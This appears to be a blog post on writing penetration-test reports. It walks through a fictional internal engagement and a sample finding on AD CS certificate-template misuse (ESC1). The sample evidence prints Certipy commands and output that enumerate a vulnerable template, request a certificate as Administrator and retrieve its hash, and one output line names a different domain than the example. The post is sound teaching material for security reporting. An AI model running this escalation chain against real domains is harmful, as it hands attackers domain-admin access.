Intro
Reporting is important.
In offensive security, clients do not pay for you to do one cool trick and call it a day, they’re paying for you to assess a system and give an overall breakdown of what risks and vulnerabilities you’ve found. After a test ends, the only real deliverable that is produced is a report detailing what issues you found over the course of said engagement.
With this in mind, you’d think that with the Certification Industrial Complex reaching all-time levels of bloat, someone would be able to explain how a report is written, going through examples of potential findings to walk people through the method as opposed to just quickly scrolling through a report?
What’s that? No, no one has? You’re telling me that the average person in tech doesn’t value writing skills and would probably enjoy offloading their creativity to AI? Ah.
Rant about writing skills aside, it is shocking that reporting almost always feels like an afterthought for many courses and instructors. Admittedly, if you’re a seasoned veteran in the field, I can understand why. However, I cannot begin to tell you how many repeat questions I see when it comes to exams where you have to deliver a report, such as the PNPT or CPTS.
My experience is obviously limited, but the point of this blog is to break down specifically how I’d approach writing a report professionally, with some bits potentially geared towards the CPTS exam, because it’s the only one I’ve taken that has a reporting component.
DISCLAIMER: There is no single correct way to write a report, hence the title. The purpose of this post is supposed to stay somewhat high level and addressing the most common components one would generally expect in any report.
A Quick Runthrough of a Report
Components
No matter how a report is structured, it will usually have the following sections:
- Executive Summary - The executive summary provides a high level overview of the assessment meant to give a relatively quick, not-too-technical description of what the assessment was, what happened, and sometimes light discussion of any strategic recommendations.
- [Optional] Attack Narrative - This section is largely dependent on what type of engagement you’re doing (i.e. more common with network pentests than application tests), but if you need it, this section summarizes all of steps that you took in an attack chain. For standard network pentests, this might be your route to domain admin. For red teams, this would specifically be your route to the crown jewels.
- Findings - The “Findings” section is where we break down each vulnerability/risk we found on an individual basis, describing what it was, the impact, and how we would recommend remediating it. This section is what a technical team will read to verify your findings and find exactly where problems lie, so it’s important to be as clear as possible.
- Remediation/Recommendations - Most reports will include a discussion of systemic remediations in the executive summary and/or individual recommendations in each of the findings. However, some reports, like the one for CPTS, will also have a section listing all of the recommendations. Here, you don’t have to give a perfect solution that completely solves the problem and accounts for all of the internal issues a company may have, but you do have to suggest some kind of control that addresses the root cause.
- Appendices - This is another section that will vary from report to report, but this generally contains information about scope, methodology, and severity ratings. If there are artifacts/indicators of compromise after an engagement, you should also list them here so they can’t be used to reenter a system later.
This repo contains a bunch of public pentesting reports, and I highly recommend going through it to get a feel for what gets prioritized over what, as well as the different styles that people take when putting reports together. For instance, you may notice that severity labels may differ from report to report, a high risk issue in one being a critical to another, or a low risk issue in one being an informational to another. Trying to cover every single nuance would make this blog way too big, so my rule of thumb is making sure the details and requirements are clear to the client so they focus on the important things.
Now, as opposed to rehashing what plenty of others have written about by describing sections, let’s run through an example scenario and how that might reflect in the various sections of a report.
Example Scenario
Writing a full report in a blog format like this one would be way too many words, so we’re going to keep this short:
Something, something any similarity to any computers or infrastructure, living or dead, is entirely coincidental.We (TeamServer Security) are doing an internal pentest for Mushroom Corp, a small/mid sized business. Starting from a non-domain joined machine on the network, I found an exposed Zabbix server and logged in with default creds, and got command execution through an agent. On that box, I found credentials stored in plaintext to get a domain account, which then let me Kerberoast the domain. I was able to crack the hash of a service account that had privileges to perform ESC1 against the ADCS service, and request a certificate for the domain admin.
By describing this entire path we took, we’ve already taken steps to describe the attack narrative that we can include in the report. Of course, this paragraph alone is not enough, and we’d want to include screenshots and command output. That said, assuming we don’t have any findings outside of this path (which there very well could be), we can start breaking this down into findings.
Findings
Why start with findings? Even though the executive summary and any systemic recommendations will come first, it’s really hard to write a summary when you haven’t dug into the details yourself.
Sometimes, engagements are easy to report on because you have a bunch of discrete vulnerabilities that aren’t very related to each other, so the findings write themselves. However, another common scenario is having paths of low or medium risk issues that end up having way higher impact than any of the findings on their own. When that happens, it’s important to critically examine your path for the root causes and the risks they bring to the table. Let’s take a look at our example and how I might break it down:
- The very first thing that happened was code execution, so you’d think that would be some kind of RCE vulnerability. However, code execution through agents in Zabbix is intended functionality, albeit through a configuration setting. In this case, it would be good to message your client and ask if this is configuration is essential to their current operation instead of trying to make shots in the dark about how their environment should operate. Since this is a configuration that’s not entirely necessary, I would report a misconfiguration in Zabbix regardless of the response, but the client response may change how I write a recommendation. But, even beyond debating whether or not command execution through an agent is truly a vulnerability, the really big problem here is the default credentials, because no standard users should even be touching this thing in the first place. (Findings: RCE via Misconfigured Zabbix Server, Default Credentials)
- Generally speaking, we don’t want to keep creds to domain accounts, especially active ones, in plain text. (Finding: Cleartext Credentials Stored on Disk)
- Kerberoasting itself is not immediately a vulnerability, at least, in the same capacity that ZeroLogon or misconfigured privileges are. The service tickets will always be encrypted with the hash of the user account, and gMSA is not a catch-all solution. However, since we were able to crack the hash of the user, that is actually concerning since it is evidence of poor credential management. (Finding: Cracked Service Account Passwords - Kerberoasting)
- And finally, ESC1 is absolutely a finding. In this example, we’re assuming only the service account user had privileges to perform ESC1, which is better than every user being able to access it. However, it’s still reportable, because ADCS shouldn’t be set up in such a way that service accounts can pivot to domain admin privileges. It is worth noting that the root cause here is not that a service account has access to ADCS, this is reasonable network design, but instead the configuration of the certificate itself. (Finding: Misconfigured Active Directory Certificate Templates - ESC1)
So, all together, these are our findings:
- RCE via Misconfigured Zabbix Server
- Default Credentials
- Cleartext Credentials Stored on Disk
- Cracked Service Account Password - Kerberoasting
- Misconfigured Active Directory Certificate Templates - ESC1
Example Finding
Let’s write up the “Misconfigured Active Directory Certificate Templates - ESC1” Finding.
CVSS: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2, high) CWE: CWE-290: Authentication Bypass by Spoofing
Description: Active Directory Certificate Services (AD CS) templates define the policies and settings for issuing and managing certificates within an Active Directory environment. Authorized principals can request templates that are made available through an internal certificate authority (CA).
TeamServer Security identified a template vulnerable to the “ESC1” domain escalation attack, which occurs when a template is configured with the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
flag in the mspki-certificate-name-flag
property. This allows an enrolling user to specify an arbitrary subject alternative name (SAN), effectively allowing a user to request a certificate as another user, such as a domain administrator or machine account.
Impact: An attacker that can gain access to svc_certificate
, the service account authorized to request the affected certificate, can request certificates to impersonate any user in the mushroomcorp.local
domain. More specifically, an attacker can leverage this certificate to gain domain administrator access to the domain, and request domain resources accordingly.
Although access to the template was restricted to a single service account, TeamServer Security successfully gained access to svc_certificate
through a low-privileged user, discussed in the “Cracked Service Account Password - Kerberoasting” finding.
Certificate Templates Impacted:
backup_crt
Evidence:
TeamServer Security enumerated the domain’s certificate templates using the open-source tool Certipy.
$ certipy find -u svc_certificate -p <REDACTED> -target mushroomcorp.local -text -stdout -vulnerable
...[snip]...
Certificate Templates
0
Template Name : backup_crt
Display Name : backup_crt
Certificate Authorities : mushroom-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : MUSHROOMCORP.LOCAL\Domain Admins
MUSHROOMCORP.LOCAL\Domain Users
MUSHROOMCORP.LOCAL\Enterprise Admins
Object Control Permissions
Owner : MUSHROOMCORP.LOCAL\Administrator
Write Owner Principals : MUSHROOMCORP.LOCAL\Domain Admins
MUSHROOMCORP.LOCAL\Enterprise Admins
MUSHROOMCORP.LOCAL\Administrator
Write Dacl Principals : MUSHROOMCORP.LOCAL\Domain Admins
MUSHROOMCORP.LOCAL\Enterprise Admins
MUSHROOMCORP.LOCAL\Administrator
Write Property Principals : MUSHROOMCORP.LOCAL\Domain Admins
MUSHROOMCORP.LOCAL\Enterprise Admins
MUSHROOMCORP.LOCAL\Administrator
[!] Vulnerabilities
ESC1 : 'MUSHROOMCORP.LOCAL\\svc_certificate' can enroll, enrollee supplies subject and template allows client authentication
The tester leveraged access as svc_certificate
to request a certificate as Administrator
, a member of the Domain Admins group.
$ certipy req -u svc_certificate -p <REDACTED> -target mushroomcorp.local -upn administrator@mushroomcorp.local -ca mushroom-dc-ca -template backup_crt
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@mushroomcorp.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
The tester then attempted to authenticate to the domain with the newly obtained certificate.
$ certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@mushroomcorp.local': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
Remediation:
TeamServer Security recommends disabling the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
flag and unchecking “Supply in Request” from the Certificate Templates (certtmpl.msc) console to prevent users from specifying arbitrary SANs in enrollment requests.
Additionally, it is recommended that Mushroom Corp review their AD CS infrastructure and templates to determine appropriate rights and permissions in accordance with the principal of least privilege.
References: SpecterOps: Certified Pre-Owned ly4k: Certipy GhostPack: PSPKIAudit
Recommendations
Recommendations can be hard, especially when the “textbook” solution is not fully compatible with a client’s needs, or if issues are systemic. For instance, on an application pentest, the design patterns and network communication of the app was so fundamentally flawed that it truly needed a full overhaul. Now, in that scenario, we did not pull up in a meeting with a client and say “it’s all bad, fix it, skill issue”.
If a vulnerability is ever that bad, it’s helpful to come up with a short term and a long term fix. In our case, we recommended implementing some hardening measures via the programming language, but long term, we simply had to recommend moving away from their model as a whole. It’s especially important to maintain a professional attitude here. The job of a pentester/red teamer/whatever we want to call it is not to gloat about how good we are and how bad everyone else is, but instead to point out the exploitability and then help clients and defenders make the right fixes.
Not every issue needs a custom solution. SQL injections can be mitigated via prepared statements. XSS can usually be mitigated with proper data validation and sanitization. In the event an issue is fuzzier, it’s okay for the recommendation to be a little more generic than you’d like, but don’t leave it at “harden SMB”. There are plenty of cases where you may not have full visibility into the costs and benefits associated with a fix you propose, just focus on addressing the root cause, and communicate with the client as best as possible.
Executive Summary
Despite the fact that the executive summary comes first in the report, it’s the last section you should really work on. This section is dedicated to a high-level overview of the engagement, including information about what it was, the scope, and most importantly, a summary of overall impressions from the engagement. I won’t go through a full executive summary here, especially since the specific structure will vary from company to company, but here are some guiding questions that can help.
- What were general trends in your findings? Were the vulnerabilities related to configuration issues, or maybe it was all injection attacks? Identifying common threads between your findings can reveal potentially systemic issues that are valuable for upper-level management to understand.
- What steps need to be taken going forward? This question is directly tied to the previous one, but is important to specifically address in the executive summary. If you see EternalBlue exploited in 2025, there’s probably something off with the client’s patch management strategy or asset inventory.
- How severe are the findings? This one’s a bit more straightforward- if your findings are all medium/low, don’t talk about your findings like they’re critical issues that will destroy the client if they’re not addressed. When reports are “drier” and don’t have high impact issues, take it as an opportunity to discuss what defensive controls stopped you, and what changes can be made to work towards a solid defense-in-depth strategy.
Looking back at our example scenario, we see that the issues were primarily related to credential management and configurations. In this case, we might recommend using password managers or some other secret management solution, as well as some user training to try and minimize the credential exposure we found. As for configurations, we can start by recommending “configure services in accordance with secure baselines”, but then also take time to elaborate on what about the services was insecure (e.g. Was it defaults? Was it unnecessary settings switched on?).
With all of this in mind, be sure to avoid very specific technical details here. This section is intended for management and above to read and get an idea of what happened, there’s a good chance they’re not up-to-date on specific exploits or the fine details of Active Directory, Okta, AWS, etc. Avoid acronyms, keep it concise, and write as if you’re explaining it to a teacher or mentor that doesn’t have the hacking skillset you have.
Appendices
Appendices can really be anything, but they’re usually good for having explicit lists for teams to reference. Plainly writing out the scope, severity ratings used, payloads, changes to the network, compromised users, etc. makes it much easier for auditors to understand the engagements, and for defenders to handle any incident response or patching.
The Most Common Errors
I’m far from a seasoned veteran that’s seen it all, but from helping review people’s reports when they’re learning to write pentest reports, these are the most common things I’ve seen. Shoutout to @absolute_rat on Discord for helping me with this section as well.
Credentials, Credentials, Credentials
Redact credentials from screenshots. Simple, right? It’s can actually be harder than you think.
It might be easy to spot usernames and passwords, but authentication material comes in many forms. SSH keys, password hashes, and JWTs are just a few of the many things that you also should be redacting in your reports. On top of this, many hacking tools (looking at you, netexec) will have passwords in the command output, which can be extremely easy to miss if you’re not cognizant about it. Sure, some of these might rotate or expire before they can be abused, but why take the risk?
I don’t have any easy tools or tricks to automatically spot sensitive info in your screenshots. You may be able to rig up some system with secrets scanners like TruffleHog or Nosey Parker with OCR, but it’s probably quicker to just train your eyes to check for this. Also, for the l33t among you, try avoiding the transparent terminal. Accidentally revealing an SSH key or database password because you can see through the terminal is an extremely common mistake for people taking certification exams.

Speaking of which, you may also want to sanitize your tool’s output if it doesn’t look very professional. There are plenty of proof of concepts out there with “epic” ASCII art headers or not-so-palatable language- just keep an eye out.
Bad Screenshots - Too Many
A picture may be worth a thousand words, but not all of those words are of the same quality. Suppose we have a finding about a file upload vulnerability, and the technical writeup section of the finding starts in a way similar to the one shown below.

I’m sure on later pages there’s a description of how the web shell was used, but right now, the actual demo of the finding starts with three screenshots, no captions (more on that later), and has a limited explanation, all of which hurt the ability for anyone to actually understand what’s important. There can certainly be findings with plenty of screenshots, but my point here is that the screenshots should serve a specific purpose. You don’t need to show every menu you used to get to a location in the application, just show the one menu that is vulnerable. In the example above, the writer could have just used the last screenshot or the first one to explain where the file upload was.
An Aside: Code Blocks vs Screenshots is something of opinion. I’ve seen places default to screenshots in the name of alleviating customer doubts on the legitimacy of a finding, and I’ve seen places default to code blocks for easier reproducibility. Whatever you do, just make sure it’s good, and that you’re presenting the right information.
Bad Screenshots - No Captions
Whether you primarily use screenshots or terminal output depends on place to place and school of thought to school of thought, but regardless, not every person reading the report knows how your tools and commands work. Part of making sure your writeups are clear is including captions to give a brief description of the screenshot or terminal output. Captions can also be good supplements to annotations within the screenshots to summarize the entire attack.


Misrepresenting Impact
Would it feel good to deliver a report with 8 highs and 7 critical vulnerabilities? Yes. However, just because we want to feel like cool hackers doesn’t mean we should full send a vulnerability with an overrated severity.
Suppose you’ve identified an account/email enumeration issue in a login form. That, on it’s own, has a relatively low impact. It’s still relevant, but if they also implement account lockouts, rate-limiting, etc., you can only do so much with usernames and emails. However, if you find that their password policy is weak, there are no account lockouts, and there is no rate-limiting, you could set yourself up for a situation where you can brute force credentials on a wider scale, which is a higher risk issue.
CVSS is the most common metric you’ll see used to assess severity, but it’s not always the most accurate representation of risk. As the curl developers have dealt with firsthand, CVSS can easily overexaggerate or underrepresent issues that are identified. The perfect example of this is the recent CUPS vulnerability with an unofficial rating of 9.9. It’s definitely a vulnerability, but the score is misleading, as there is user interaction involved, albeit later in the attack steps. Coming back to the main point, how a penetration tester rates a finding will vary from company to company. Some may use custom rating systems, some stick to just CVSS, others will show CVSS and just put a label on it (e.g. maybe CVSS shows a high rating, but the finding is actually rated medium). Whatever the case, know that the severity of findings matter, and your goal should be to represent the risk accurately.
Writing Style
This is one of the harder ones for me to explain because I am not an English or writing teacher, but there are some common pitfalls when you’re doing the actual writing.
For one, try sticking to an active voice as much as possible. Here’s an example of passive voice:
The web application was exploited by the tester after running the
sqlmap
tool to retrieve the admin’s hash.
Here, the action (“exploited”) is performed on the subject (“vulnerability”), which adds some unnecessary verbosity to the sentence. The active voice would look like this:
The tester exploited the vulnerability by running the
sqlmap
tool to obtain the admin’s hash.
By using the active voice, the sentence reads more clearly without compromising professionalism. Now, not every sentence needs to be in the active voice, but striving to format sentences in this way can help keep your message straightforward, which can be important when talking about complex attacks.
Also related to this example, another common pitfall is overusing phrases like “the tester”. My preferred solution is to use synonyms like “the team” or “[COMPANY NAME]”, or even pronouns if it makes sense in context, like “they” or “theirs”. However, if you’re confident in your writing skills, you can actually omit “the tester” altogether:
sqlmap
, an open source tool, identified a time-based SQL injection vulnerability in the application. In doing so, the tool successfully extracted the admin user’s password hash.
This example is not perfect and certainly isn’t my writing style, but it absolutely another approach you can take.
Conclusion
Hopefully, this serves as a good reference for anyone looking to learn about reporting or improve their reporting skills. There’s only so much I could include in here before it gets way too long. Realistically speaking, if you are hired by a company to do penetration testing, they should be the ones to train you on their reporting process. However, I still think it’s helpful to have information like this out there, for those wanting to learn about this job or for those who want a different perspective.
The best practice you can get reporting is by just doing it. Do practice labs/networks, copy an existing report template, and give it a try! Struggling through awkward situations will only make your ability to break down vulnerabilities and risk that much better. That said, reports can take a lot of time and effort, so starting with simpler writeups might be better. I highly recommend checking out 0xdf or 7Rocky for their writeups on various CTF challenges. Although they’re not real environments, they do a great job of pacing and presenting information.